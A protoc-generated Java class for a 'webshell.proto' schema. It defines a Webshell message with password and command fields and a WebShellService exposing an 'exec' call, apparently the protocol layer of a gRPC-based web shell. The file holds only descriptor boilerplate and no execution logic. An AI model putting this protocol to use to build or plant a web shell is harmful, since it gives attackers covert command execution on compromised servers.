// Generated by the protocol buffer compiler.  DO NOT EDIT!
// source: webshell.proto

package com.demo.shell.protocol;

public final class WebshellOuterClass {
  private WebshellOuterClass() {}
  public static void registerAllExtensions(
      com.google.protobuf.ExtensionRegistryLite registry) {
  }

  public static void registerAllExtensions(
      com.google.protobuf.ExtensionRegistry registry) {
    registerAllExtensions(
        (com.google.protobuf.ExtensionRegistryLite) registry);
  }
  static final com.google.protobuf.Descriptors.Descriptor
    internal_static_protocol_Webshell_descriptor;
  static final 
    com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
      internal_static_protocol_Webshell_fieldAccessorTable;

  public static com.google.protobuf.Descriptors.FileDescriptor
      getDescriptor() {
    return descriptor;
  }
  private static  com.google.protobuf.Descriptors.FileDescriptor
      descriptor;
  static {
    java.lang.String[] descriptorData = {
      "\n\016webshell.proto\022\010protocol\"$\n\010Webshell\022\013" +
      "\n\003pwd\030\001 \001(\t\022\013\n\003cmd\030\002 \001(\t2C\n\017WebShellServ" +
      "ice\0220\n\004exec\022\022.protocol.Webshell\032\022.protoc" +
      "ol.Webshell\"\000B%\n\027com.demo.shell.protocol" +
      "P\001Z\010protocolb\006proto3"
    };
    descriptor = com.google.protobuf.Descriptors.FileDescriptor
      .internalBuildGeneratedFileFrom(descriptorData,
        new com.google.protobuf.Descriptors.FileDescriptor[] {
        });
    internal_static_protocol_Webshell_descriptor =
      getDescriptor().getMessageTypes().get(0);
    internal_static_protocol_Webshell_fieldAccessorTable = new
      com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
        internal_static_protocol_Webshell_descriptor,
        new java.lang.String[] { "Pwd", "Cmd", });
  }

  // @@protoc_insertion_point(outer_class_scope)
}
